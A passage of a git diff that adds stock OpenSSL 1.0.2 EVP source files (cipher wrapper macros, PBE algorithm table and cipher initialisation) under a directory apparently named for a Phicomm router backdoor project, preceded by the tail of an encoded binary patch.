zbHgDV=vUeg-zE76>5=ESeUJEK#90^Ph4VHO=XHFY_)g+{&Rr!QBhL5xKJjNXJ9mj6
z*6ch0eVlhhv!f&y!FYR%fS(ZlY!}gIJFWJ8oo2Ml8nhiNS;&N};c;Qb;vH>9-0Il7
zw>z4!5=L7*YKe}Vo$2n5M}}=-bRP&=iEnpCrCK)S*iOO84`&8di_)5twQ|XPa#S5C
zC{rz4Lb`?}X~6<hXi}LRR8+gpM9vl+ZTqdv@R9A=fn%;DfM|QdI-0j_Rd^tsO^sNX
zfT^@S(QD}=!?__luM4GC(WB|)U_lqF2xX{qIqOK$N$LtRHWkK($E~!T8FYqpg^B|s
z_QV?El}8|8x?M(3NA!RIk&(vD1MM7|RDm1Qt}ZJ#=2&(<pLK%=qRY{M4u*QvotAod
z@2f;oX*-!;jUBt73ezS=n=7p-1G*(;NU;WI!B#pC;4zbL+eP@c!}1M<<C({N7je#~
zne%%F`FchEcO;MY@oZrE4-~H2|0{9bek+`-Sdedki|xEi9PMLv!Tdf1P*5IoX6DTb
z|FXjC=o~?LJR?~i-*;G$V=l-X85T5$*XN3VDzBya`21%1zmPnim&{q7&sXN_$qxFU
z+K&;(dsI2TC$R9h3)|uMb3l$R``=CSIwvvFtI2bolGZrqDHk;kN3|@kX`J(pYZ_-i
z=QYlG#3vf(JfdFN4|q$QM{LwM=MgO$=R6{!an2)pHO_ei<{?-(&YVYlN8_AFT+le@
z5kJ*9=Mgg+pQZJ>u5r#IZfKnIh`So+JfeZ@vH$bb4``h8h*phrz7W?q=L`KB=X?S4
z5H)U`FPzml=L;`robv^a9}eTi`NG?pJm(7{SeO`fk^@jXdAA<oR^Co0gN}W|5kdLd
z3Jw$sBACx&2gO4{NGYU{%S14h9UZkZAfL%Pb`btwXf8O()ClzlGh@MAKAW@i&IBpi
zL-3MLj@t6x|DT@#DC3gqUshpYSjOmFb9=5Vx3PW{E<D@9aH*x!=l1yAy$`xL51(Uv
z-fSVRO(TAx1J@iM1JrZRTC}N)e^Gt>{zAXDFIjXOtly$>+Wt#^L}45mZIdPGTjbDJ
zmx$ZISg9opol5aLO9%KLNEqXXYoy2TX<#_N?q>r{^fee$i|+rkFvv`mds26l26fq^
z!0{VGzyDU!50D;L>_7KUK?7~-`n{xoT^rE#CqNfP!*HpkACm|ueBNOEFi&88-hY+m
xM!hEbFuF^A;P(e!x;}p2=z9;42+)g}&naYB^!TBhmGn(|QJ<As%RjpQ{{U?@tBn8v

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_locl.h
new file mode 100644
index 0000000..2bb709a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_locl.h
@@ -0,0 +1,373 @@
+/* evp_locl.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* Macros to code block cipher wrappers */
+
+/* Wrapper functions for each cipher mode */
+
+#define BLOCK_CIPHER_ecb_loop() \
+        size_t i, bl; \
+        bl = ctx->cipher->block_size;\
+        if(inl < bl) return 1;\
+        inl -= bl; \
+        for(i=0; i <= inl; i+=bl)
+
+#define BLOCK_CIPHER_func_ecb(cname, cprefix, kstruct, ksched) \
+static int cname##_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t inl) \
+{\
+        BLOCK_CIPHER_ecb_loop() \
+                cprefix##_ecb_encrypt(in + i, out + i, &((kstruct *)ctx->cipher_data)->ksched, ctx->encrypt);\
+        return 1;\
+}
+
+#define EVP_MAXCHUNK ((size_t)1<<(sizeof(long)*8-2))
+
+#define BLOCK_CIPHER_func_ofb(cname, cprefix, cbits, kstruct, ksched) \
+static int cname##_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t inl) \
+{\
+        while(inl>=EVP_MAXCHUNK)\
+            {\
+            cprefix##_ofb##cbits##_encrypt(in, out, (long)EVP_MAXCHUNK, &((kstruct *)ctx->cipher_data)->ksched, ctx->iv, &ctx->num);\
+            inl-=EVP_MAXCHUNK;\
+            in +=EVP_MAXCHUNK;\
+            out+=EVP_MAXCHUNK;\
+            }\
+        if (inl)\
+            cprefix##_ofb##cbits##_encrypt(in, out, (long)inl, &((kstruct *)ctx->cipher_data)->ksched, ctx->iv, &ctx->num);\
+        return 1;\
+}
+
+#define BLOCK_CIPHER_func_cbc(cname, cprefix, kstruct, ksched) \
+static int cname##_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t inl) \
+{\
+        while(inl>=EVP_MAXCHUNK) \
+            {\
+            cprefix##_cbc_encrypt(in, out, (long)EVP_MAXCHUNK, &((kstruct *)ctx->cipher_data)->ksched, ctx->iv, ctx->encrypt);\
+            inl-=EVP_MAXCHUNK;\
+            in +=EVP_MAXCHUNK;\
+            out+=EVP_MAXCHUNK;\
+            }\
+        if (inl)\
+            cprefix##_cbc_encrypt(in, out, (long)inl, &((kstruct *)ctx->cipher_data)->ksched, ctx->iv, ctx->encrypt);\
+        return 1;\
+}
+
+#define BLOCK_CIPHER_func_cfb(cname, cprefix, cbits, kstruct, ksched) \
+static int cname##_cfb##cbits##_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t inl) \
+{\
+        size_t chunk=EVP_MAXCHUNK;\
+        if (cbits==1)  chunk>>=3;\
+        if (inl<chunk) chunk=inl;\
+        while(inl && inl>=chunk)\
+            {\
+            cprefix##_cfb##cbits##_encrypt(in, out, (long)((cbits==1) && !(ctx->flags & EVP_CIPH_FLAG_LENGTH_BITS) ?inl*8:inl), &((kstruct *)ctx->cipher_data)->ksched, ctx->iv, &ctx->num, ctx->encrypt);\
+            inl-=chunk;\
+            in +=chunk;\
+            out+=chunk;\
+            if(inl<chunk) chunk=inl;\
+            }\
+        return 1;\
+}
+
+#define BLOCK_CIPHER_all_funcs(cname, cprefix, cbits, kstruct, ksched) \
+        BLOCK_CIPHER_func_cbc(cname, cprefix, kstruct, ksched) \
+        BLOCK_CIPHER_func_cfb(cname, cprefix, cbits, kstruct, ksched) \
+        BLOCK_CIPHER_func_ecb(cname, cprefix, kstruct, ksched) \
+        BLOCK_CIPHER_func_ofb(cname, cprefix, cbits, kstruct, ksched)
+
+#define BLOCK_CIPHER_def1(cname, nmode, mode, MODE, kstruct, nid, block_size, \
+                          key_len, iv_len, flags, init_key, cleanup, \
+                          set_asn1, get_asn1, ctrl) \
+static const EVP_CIPHER cname##_##mode = { \
+        nid##_##nmode, block_size, key_len, iv_len, \
+        flags | EVP_CIPH_##MODE##_MODE, \
+        init_key, \
+        cname##_##mode##_cipher, \
+        cleanup, \
+        sizeof(kstruct), \
+        set_asn1, get_asn1,\
+        ctrl, \
+        NULL \
+}; \
+const EVP_CIPHER *EVP_##cname##_##mode(void) { return &cname##_##mode; }
+
+#define BLOCK_CIPHER_def_cbc(cname, kstruct, nid, block_size, key_len, \
+                             iv_len, flags, init_key, cleanup, set_asn1, \
+                             get_asn1, ctrl) \
+BLOCK_CIPHER_def1(cname, cbc, cbc, CBC, kstruct, nid, block_size, key_len, \
+                  iv_len, flags, init_key, cleanup, set_asn1, get_asn1, ctrl)
+
+#define BLOCK_CIPHER_def_cfb(cname, kstruct, nid, key_len, \
+                             iv_len, cbits, flags, init_key, cleanup, \
+                             set_asn1, get_asn1, ctrl) \
+BLOCK_CIPHER_def1(cname, cfb##cbits, cfb##cbits, CFB, kstruct, nid, 1, \
+                  key_len, iv_len, flags, init_key, cleanup, set_asn1, \
+                  get_asn1, ctrl)
+
+#define BLOCK_CIPHER_def_ofb(cname, kstruct, nid, key_len, \
+                             iv_len, cbits, flags, init_key, cleanup, \
+                             set_asn1, get_asn1, ctrl) \
+BLOCK_CIPHER_def1(cname, ofb##cbits, ofb, OFB, kstruct, nid, 1, \
+                  key_len, iv_len, flags, init_key, cleanup, set_asn1, \
+                  get_asn1, ctrl)
+
+#define BLOCK_CIPHER_def_ecb(cname, kstruct, nid, block_size, key_len, \
+                             flags, init_key, cleanup, set_asn1, \
+                             get_asn1, ctrl) \
+BLOCK_CIPHER_def1(cname, ecb, ecb, ECB, kstruct, nid, block_size, key_len, \
+                  0, flags, init_key, cleanup, set_asn1, get_asn1, ctrl)
+
+#define BLOCK_CIPHER_defs(cname, kstruct, \
+                          nid, block_size, key_len, iv_len, cbits, flags, \
+                          init_key, cleanup, set_asn1, get_asn1, ctrl) \
+BLOCK_CIPHER_def_cbc(cname, kstruct, nid, block_size, key_len, iv_len, flags, \
+                     init_key, cleanup, set_asn1, get_asn1, ctrl) \
+BLOCK_CIPHER_def_cfb(cname, kstruct, nid, key_len, iv_len, cbits, \
+                     flags, init_key, cleanup, set_asn1, get_asn1, ctrl) \
+BLOCK_CIPHER_def_ofb(cname, kstruct, nid, key_len, iv_len, cbits, \
+                     flags, init_key, cleanup, set_asn1, get_asn1, ctrl) \
+BLOCK_CIPHER_def_ecb(cname, kstruct, nid, block_size, key_len, flags, \
+                     init_key, cleanup, set_asn1, get_asn1, ctrl)
+
+/*-
+#define BLOCK_CIPHER_defs(cname, kstruct, \
+                                nid, block_size, key_len, iv_len, flags,\
+                                 init_key, cleanup, set_asn1, get_asn1, ctrl)\
+static const EVP_CIPHER cname##_cbc = {\
+        nid##_cbc, block_size, key_len, iv_len, \
+        flags | EVP_CIPH_CBC_MODE,\
+        init_key,\
+        cname##_cbc_cipher,\
+        cleanup,\
+        sizeof(EVP_CIPHER_CTX)-sizeof((((EVP_CIPHER_CTX *)NULL)->c))+\
+                sizeof((((EVP_CIPHER_CTX *)NULL)->c.kstruct)),\
+        set_asn1, get_asn1,\
+        ctrl, \
+        NULL \
+};\
+const EVP_CIPHER *EVP_##cname##_cbc(void) { return &cname##_cbc; }\
+static const EVP_CIPHER cname##_cfb = {\
+        nid##_cfb64, 1, key_len, iv_len, \
+        flags | EVP_CIPH_CFB_MODE,\
+        init_key,\
+        cname##_cfb_cipher,\
+        cleanup,\
+        sizeof(EVP_CIPHER_CTX)-sizeof((((EVP_CIPHER_CTX *)NULL)->c))+\
+                sizeof((((EVP_CIPHER_CTX *)NULL)->c.kstruct)),\
+        set_asn1, get_asn1,\
+        ctrl,\
+        NULL \
+};\
+const EVP_CIPHER *EVP_##cname##_cfb(void) { return &cname##_cfb; }\
+static const EVP_CIPHER cname##_ofb = {\
+        nid##_ofb64, 1, key_len, iv_len, \
+        flags | EVP_CIPH_OFB_MODE,\
+        init_key,\
+        cname##_ofb_cipher,\
+        cleanup,\
+        sizeof(EVP_CIPHER_CTX)-sizeof((((EVP_CIPHER_CTX *)NULL)->c))+\
+                sizeof((((EVP_CIPHER_CTX *)NULL)->c.kstruct)),\
+        set_asn1, get_asn1,\
+        ctrl,\
+        NULL \
+};\
+const EVP_CIPHER *EVP_##cname##_ofb(void) { return &cname##_ofb; }\
+static const EVP_CIPHER cname##_ecb = {\
+        nid##_ecb, block_size, key_len, iv_len, \
+        flags | EVP_CIPH_ECB_MODE,\
+        init_key,\
+        cname##_ecb_cipher,\
+        cleanup,\
+        sizeof(EVP_CIPHER_CTX)-sizeof((((EVP_CIPHER_CTX *)NULL)->c))+\
+                sizeof((((EVP_CIPHER_CTX *)NULL)->c.kstruct)),\
+        set_asn1, get_asn1,\
+        ctrl,\
+        NULL \
+};\
+const EVP_CIPHER *EVP_##cname##_ecb(void) { return &cname##_ecb; }
+*/
+
+#define IMPLEMENT_BLOCK_CIPHER(cname, ksched, cprefix, kstruct, nid, \
+                               block_size, key_len, iv_len, cbits, \
+                               flags, init_key, \
+                               cleanup, set_asn1, get_asn1, ctrl) \
+        BLOCK_CIPHER_all_funcs(cname, cprefix, cbits, kstruct, ksched) \
+        BLOCK_CIPHER_defs(cname, kstruct, nid, block_size, key_len, iv_len, \
+                          cbits, flags, init_key, cleanup, set_asn1, \
+                          get_asn1, ctrl)
+
+#define EVP_C_DATA(kstruct, ctx)        ((kstruct *)(ctx)->cipher_data)
+
+#define IMPLEMENT_CFBR(cipher,cprefix,kstruct,ksched,keysize,cbits,iv_len) \
+        BLOCK_CIPHER_func_cfb(cipher##_##keysize,cprefix,cbits,kstruct,ksched) \
+        BLOCK_CIPHER_def_cfb(cipher##_##keysize,kstruct, \
+                             NID_##cipher##_##keysize, keysize/8, iv_len, cbits, \
+                             0, cipher##_init_key, NULL, \
+                             EVP_CIPHER_set_asn1_iv, \
+                             EVP_CIPHER_get_asn1_iv, \
+                             NULL)
+
+struct evp_pkey_ctx_st {
+    /* Method associated with this operation */
+    const EVP_PKEY_METHOD *pmeth;
+    /* Engine that implements this method or NULL if builtin */
+    ENGINE *engine;
+    /* Key: may be NULL */
+    EVP_PKEY *pkey;
+    /* Peer key for key agreement, may be NULL */
+    EVP_PKEY *peerkey;
+    /* Actual operation */
+    int operation;
+    /* Algorithm specific data */
+    void *data;
+    /* Application specific data */
+    void *app_data;
+    /* Keygen callback */
+    EVP_PKEY_gen_cb *pkey_gencb;
+    /* implementation specific keygen data */
+    int *keygen_info;
+    int keygen_info_count;
+} /* EVP_PKEY_CTX */ ;
+
+#define EVP_PKEY_FLAG_DYNAMIC   1
+
+struct evp_pkey_method_st {
+    int pkey_id;
+    int flags;
+    int (*init) (EVP_PKEY_CTX *ctx);
+    int (*copy) (EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src);
+    void (*cleanup) (EVP_PKEY_CTX *ctx);
+    int (*paramgen_init) (EVP_PKEY_CTX *ctx);
+    int (*paramgen) (EVP_PKEY_CTX *ctx, EVP_PKEY *pkey);
+    int (*keygen_init) (EVP_PKEY_CTX *ctx);
+    int (*keygen) (EVP_PKEY_CTX *ctx, EVP_PKEY *pkey);
+    int (*sign_init) (EVP_PKEY_CTX *ctx);
+    int (*sign) (EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
+                 const unsigned char *tbs, size_t tbslen);
+    int (*verify_init) (EVP_PKEY_CTX *ctx);
+    int (*verify) (EVP_PKEY_CTX *ctx,
+                   const unsigned char *sig, size_t siglen,
+                   const unsigned char *tbs, size_t tbslen);
+    int (*verify_recover_init) (EVP_PKEY_CTX *ctx);
+    int (*verify_recover) (EVP_PKEY_CTX *ctx,
+                           unsigned char *rout, size_t *routlen,
+                           const unsigned char *sig, size_t siglen);
+    int (*signctx_init) (EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx);
+    int (*signctx) (EVP_PKEY_CTX *ctx, unsigned char *sig, size_t *siglen,
+                    EVP_MD_CTX *mctx);
+    int (*verifyctx_init) (EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx);
+    int (*verifyctx) (EVP_PKEY_CTX *ctx, const unsigned char *sig, int siglen,
+                      EVP_MD_CTX *mctx);
+    int (*encrypt_init) (EVP_PKEY_CTX *ctx);
+    int (*encrypt) (EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
+                    const unsigned char *in, size_t inlen);
+    int (*decrypt_init) (EVP_PKEY_CTX *ctx);
+    int (*decrypt) (EVP_PKEY_CTX *ctx, unsigned char *out, size_t *outlen,
+                    const unsigned char *in, size_t inlen);
+    int (*derive_init) (EVP_PKEY_CTX *ctx);
+    int (*derive) (EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen);
+    int (*ctrl) (EVP_PKEY_CTX *ctx, int type, int p1, void *p2);
+    int (*ctrl_str) (EVP_PKEY_CTX *ctx, const char *type, const char *value);
+} /* EVP_PKEY_METHOD */ ;
+
+void evp_pkey_set_cb_translate(BN_GENCB *cb, EVP_PKEY_CTX *ctx);
+
+int PKCS5_v2_PBKDF2_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass,
+                             int passlen, ASN1_TYPE *param,
+                             const EVP_CIPHER *c, const EVP_MD *md,
+                             int en_de);
+
+const EVP_MD *evp_get_fips_md(const EVP_MD *md);
+const EVP_CIPHER *evp_get_fips_cipher(const EVP_CIPHER *cipher);
+
+#ifdef OPENSSL_FIPS
+
+# ifdef OPENSSL_DOING_MAKEDEPEND
+#  undef SHA1_Init
+#  undef SHA1_Update
+#  undef SHA224_Init
+#  undef SHA256_Init
+#  undef SHA384_Init
+#  undef SHA512_Init
+#  undef DES_set_key_unchecked
+# endif
+
+# define RIPEMD160_Init  private_RIPEMD160_Init
+# define WHIRLPOOL_Init  private_WHIRLPOOL_Init
+# define MD5_Init        private_MD5_Init
+# define MD4_Init        private_MD4_Init
+# define MD2_Init        private_MD2_Init
+# define MDC2_Init       private_MDC2_Init
+# define SHA_Init        private_SHA_Init
+# define SHA1_Init       private_SHA1_Init
+# define SHA224_Init     private_SHA224_Init
+# define SHA256_Init     private_SHA256_Init
+# define SHA384_Init     private_SHA384_Init
+# define SHA512_Init     private_SHA512_Init
+
+# define BF_set_key      private_BF_set_key
+# define CAST_set_key    private_CAST_set_key
+# define idea_set_encrypt_key    private_idea_set_encrypt_key
+# define SEED_set_key    private_SEED_set_key
+# define RC2_set_key     private_RC2_set_key
+# define RC4_set_key     private_RC4_set_key
+# define DES_set_key_unchecked   private_DES_set_key_unchecked
+# define Camellia_set_key        private_Camellia_set_key
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pbe.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pbe.c
new file mode 100644
index 0000000..e3fa95d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_pbe.c
@@ -0,0 +1,304 @@
+/* evp_pbe.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/pkcs12.h>
+#include <openssl/x509.h>
+#include "evp_locl.h"
+
+/* Password based encryption (PBE) functions */
+
+DECLARE_STACK_OF(EVP_PBE_CTL)
+static STACK_OF(EVP_PBE_CTL) *pbe_algs;
+
+/* Setup a cipher context from a PBE algorithm */
+
+typedef struct {
+    int pbe_type;
+    int pbe_nid;
+    int cipher_nid;
+    int md_nid;
+    EVP_PBE_KEYGEN *keygen;
+} EVP_PBE_CTL;
+
+static const EVP_PBE_CTL builtin_pbe[] = {
+    {EVP_PBE_TYPE_OUTER, NID_pbeWithMD2AndDES_CBC,
+     NID_des_cbc, NID_md2, PKCS5_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbeWithMD5AndDES_CBC,
+     NID_des_cbc, NID_md5, PKCS5_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbeWithSHA1AndRC2_CBC,
+     NID_rc2_64_cbc, NID_sha1, PKCS5_PBE_keyivgen},
+
+#ifndef OPENSSL_NO_HMAC
+    {EVP_PBE_TYPE_OUTER, NID_id_pbkdf2, -1, -1, PKCS5_v2_PBKDF2_keyivgen},
+#endif
+
+    {EVP_PBE_TYPE_OUTER, NID_pbe_WithSHA1And128BitRC4,
+     NID_rc4, NID_sha1, PKCS12_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbe_WithSHA1And40BitRC4,
+     NID_rc4_40, NID_sha1, PKCS12_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbe_WithSHA1And3_Key_TripleDES_CBC,
+     NID_des_ede3_cbc, NID_sha1, PKCS12_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbe_WithSHA1And2_Key_TripleDES_CBC,
+     NID_des_ede_cbc, NID_sha1, PKCS12_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbe_WithSHA1And128BitRC2_CBC,
+     NID_rc2_cbc, NID_sha1, PKCS12_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbe_WithSHA1And40BitRC2_CBC,
+     NID_rc2_40_cbc, NID_sha1, PKCS12_PBE_keyivgen},
+
+#ifndef OPENSSL_NO_HMAC
+    {EVP_PBE_TYPE_OUTER, NID_pbes2, -1, -1, PKCS5_v2_PBE_keyivgen},
+#endif
+    {EVP_PBE_TYPE_OUTER, NID_pbeWithMD2AndRC2_CBC,
+     NID_rc2_64_cbc, NID_md2, PKCS5_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbeWithMD5AndRC2_CBC,
+     NID_rc2_64_cbc, NID_md5, PKCS5_PBE_keyivgen},
+    {EVP_PBE_TYPE_OUTER, NID_pbeWithSHA1AndDES_CBC,
+     NID_des_cbc, NID_sha1, PKCS5_PBE_keyivgen},
+
+    {EVP_PBE_TYPE_PRF, NID_hmacWithSHA1, -1, NID_sha1, 0},
+    {EVP_PBE_TYPE_PRF, NID_hmacWithMD5, -1, NID_md5, 0},
+    {EVP_PBE_TYPE_PRF, NID_hmacWithSHA224, -1, NID_sha224, 0},
+    {EVP_PBE_TYPE_PRF, NID_hmacWithSHA256, -1, NID_sha256, 0},
+    {EVP_PBE_TYPE_PRF, NID_hmacWithSHA384, -1, NID_sha384, 0},
+    {EVP_PBE_TYPE_PRF, NID_hmacWithSHA512, -1, NID_sha512, 0},
+    {EVP_PBE_TYPE_PRF, NID_id_HMACGostR3411_94, -1, NID_id_GostR3411_94, 0},
+};
+
+#ifdef TEST
+int main(int argc, char **argv)
+{
+    int i, nid_md, nid_cipher;
+    EVP_PBE_CTL *tpbe, *tpbe2;
+    /*
+     * OpenSSL_add_all_algorithms();
+     */
+
+    for (i = 0; i < sizeof(builtin_pbe) / sizeof(EVP_PBE_CTL); i++) {
+        tpbe = builtin_pbe + i;
+        fprintf(stderr, "%d %d %s ", tpbe->pbe_type, tpbe->pbe_nid,
+                OBJ_nid2sn(tpbe->pbe_nid));
+        if (EVP_PBE_find(tpbe->pbe_type, tpbe->pbe_nid,
+                         &nid_cipher, &nid_md, 0))
+            fprintf(stderr, "Found %s %s\n",
+                    OBJ_nid2sn(nid_cipher), OBJ_nid2sn(nid_md));
+        else
+            fprintf(stderr, "Find ERROR!!\n");
+    }
+
+    return 0;
+}
+#endif
+
+int EVP_PBE_CipherInit(ASN1_OBJECT *pbe_obj, const char *pass, int passlen,
+                       ASN1_TYPE *param, EVP_CIPHER_CTX *ctx, int en_de)
+{
+    const EVP_CIPHER *cipher;
+    const EVP_MD *md;
+    int cipher_nid, md_nid;
+    EVP_PBE_KEYGEN *keygen;
+
+    if (!EVP_PBE_find(EVP_PBE_TYPE_OUTER, OBJ_obj2nid(pbe_obj),
+                      &cipher_nid, &md_nid, &keygen)) {
+        char obj_tmp[80];
+        EVPerr(EVP_F_EVP_PBE_CIPHERINIT, EVP_R_UNKNOWN_PBE_ALGORITHM);
+        if (!pbe_obj)
+            BUF_strlcpy(obj_tmp, "NULL", sizeof obj_tmp);
+        else
+            i2t_ASN1_OBJECT(obj_tmp, sizeof obj_tmp, pbe_obj);
+        ERR_add_error_data(2, "TYPE=", obj_tmp);
+        return 0;
+    }
+
+    if (!pass)
+        passlen = 0;
+    else if (passlen == -1)
+        passlen = strlen(pass);
+
+    if (cipher_nid == -1)
+        cipher = NULL;
+    else {
+        cipher = EVP_get_cipherbynid(cipher_nid);
+        if (!cipher) {
+            EVPerr(EVP_F_EVP_PBE_CIPHERINIT, EVP_R_UNKNOWN_CIPHER);
+            return 0;
+        }
+    }
+
+    if (md_nid == -1)
+        md = NULL;
+    else {
+        md = EVP_get_digestbynid(md_nid);
+        if (!md) {
+            EVPerr(EVP_F_EVP_PBE_CIPHERINIT, EVP_R_UNKNOWN_DIGEST);
+            return 0;
+        }
+    }
+
+    if (!keygen(ctx, pass, passlen, param, cipher, md, en_de)) {
+        EVPerr(EVP_F_EVP_PBE_CIPHERINIT, EVP_R_KEYGEN_FAILURE);
+        return 0;
+    }
+    return 1;
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(EVP_PBE_CTL, EVP_PBE_CTL, pbe2);
+
+static int pbe2_cmp(const EVP_PBE_CTL *pbe1, const EVP_PBE_CTL *pbe2)
+{
+    int ret = pbe1->pbe_type - pbe2->pbe_type;
+    if (ret)
+        return ret;
+    else
+        return pbe1->pbe_nid - pbe2->pbe_nid;
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(EVP_PBE_CTL, EVP_PBE_CTL, pbe2);
+
+static int pbe_cmp(const EVP_PBE_CTL *const *a, const EVP_PBE_CTL *const *b)
+{
+    int ret = (*a)->pbe_type - (*b)->pbe_type;
+    if (ret)
+        return ret;
+    else
+        return (*a)->pbe_nid - (*b)->pbe_nid;
+}
+
+/* Add a PBE algorithm */
+
